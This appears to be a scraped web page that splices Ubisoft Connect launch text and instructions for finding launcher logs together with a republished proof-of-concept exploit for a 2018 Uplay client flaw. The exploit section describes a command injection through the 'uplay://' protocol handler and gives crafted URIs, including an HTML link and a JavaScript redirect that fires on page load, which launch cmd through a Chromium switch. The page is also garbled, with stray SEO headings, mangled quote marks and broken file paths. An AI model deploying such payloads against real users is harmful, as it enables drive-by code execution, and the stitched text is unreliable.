The Ubisoft Uplay Desktop App

Ubisoft Connect Desktop App Logs


Finding your Ubisoft Connect Desktop App Logs

Oct 26, 2020 Introducing Ubisoft Connect – The Future of our Desktop App October 21, 2020, 4:00 PM Ubisoft Connect links players and services on Ubisoft games across all platforms, and it’s launching on October 27, 2020. It is the unification and improvement of Ubisoft Club, our loyalty program, and Uplay, our Desktop App, across all platforms. I was wondering if there will be or already is a way to access the UPlay App like i can access Steam via the Manage Steam button. Open a uplay game from gefroce now library that you don’t own. A window will pop asking you to enter the CDKAY, click cancel, and it will take you to the uplay. Ubisoft Connect is a free service available on all devices. You can access it on your PC, through a mobile app, or on console directly from your games. All you need to login is a Ubisoft Account!


Desktop Your Uplay logs already exist and are generated by the Ubisoft Connect Desktop App so you won’t need any tools to get these.
These are located in the “logs” folder which in turn is located in the Uplay installation directory. (Default:C:Program Files (x86)UbisoftUbisoft Game Launcherlogs or C:Program FilesUbisoftUbisoft Game Launcherlogs)
Sending us your Ubisoft Connect Logs
You can e-mail them to us at ubisoftconnectcommunity(at)ubisoft.com and make sure to identify yourself in your e-mail so that we know who the logs belong to. Please note: This is NOT a Support e-mail address. We do not reply to e-mails sent to this address so please include a link to where your original issue is posted for reference.
Please note that we do prefer you to post your technical issues publicly so that others who might experience something similar can find them, along with whatever solutions we find along the way. Sharing is caring!
If you're sending multiple logs you can always put them in a archive to make for easy transfer. (You can still attache multiple files via e-mail if you prefer)
To get an archive (.zip) file of you logs just do the following.
  • Right click on the 'logs' folder
  • Go to to “Send To” and then click on “Compressed (zipped) folder”
  • This will create a new file called logs.zip that you can send to us

# Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 – Remote Code Execution
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A

# Vulnerability
# The Uplay desktop client does not properly validate user-controlled data passed to its custom
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF)
# integrated within the Uplay client, allowing for arbitrary code execution.

# Installing Uplay registers the following custom uplay protocol handler:
# HKEY_CLASSES_ROOT
# uplay
# (Default) = “URL:uplay Protocol”
# URL Protocol = “”
# DefaultIcon
# (Default) = “upc.exe”
# Shell
# Open
# Command
# (Default) = “C:Program Files (x86)UbisoftUbisoft Game Launcherupc.exe” “%1″

# The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution:

‘uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘

# When a victim opens this URI, the string is passed to the Windows ShellExecute function.
# Microsoft states the following: “When ShellExecute executes the pluggable protocol handler with a
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will
# be interpreted as part of the command line. This means that if you use C/C++’s argc and
# argv to determine the arguments passed to your application, the string may be broken
# across multiple parameters.”

# “Malicious parties could use additional quote or backslash characters to pass additional command
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on
# the command line could come from malicious parties, and carefully validate them.”

# The Uplay desktop client does not properly validate user-controlled data. An attacker can inject
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the
# command line with a quote character and inserts a new switch called –GPU-launcher. Since the
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported.
# The –GPU-launcher switch provides a method to execute arbitrary commands. The following string shows
# the final command, which opens the Windows command prompt and executes the whoami program.

“C:Program Files (x86)UbisoftUbisoft Game Launcherupc.exe” “foobar” –GPU-launcher=”cmd /K whoami &” –”

The ubisoft uplay desktop app free

# Attack Scenario
# The following attack scenario would result in the compromise of a victim’s machine with the vulnerable
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge
# is trying to open “UPlay launcher”. After the user gives consent, the vulnerable application runs,
# resulting in arbitrary code execution in the context of the current process.

Ubisoft Desktop Client

# This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape
# illegal characters before passing the URI to the protocol handler.

# After Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables
# before the –GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService
# requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear.
# It should be noted, this UAC prompt doesn’t prevent command execution from occurring.
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No),
# command execution will still occur once the code that passes the –GPU-launcher switch
# to the CEF is triggered within upc.exe.

# Proof of Concept
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge.
# The first method triggers when the webpage is opened. The second method triggers when the
# hyperlink is clicked by a user.

POC:
[su_quote]

The Ubisoft Uplay Desktop App Download

<!doctype html>
<a href=’uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘>ubisoft uplay desktop client rce poc</a>

Uplay

<script>
window.location = ‘uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘
</script>

[/su_quote]

Comments are closed.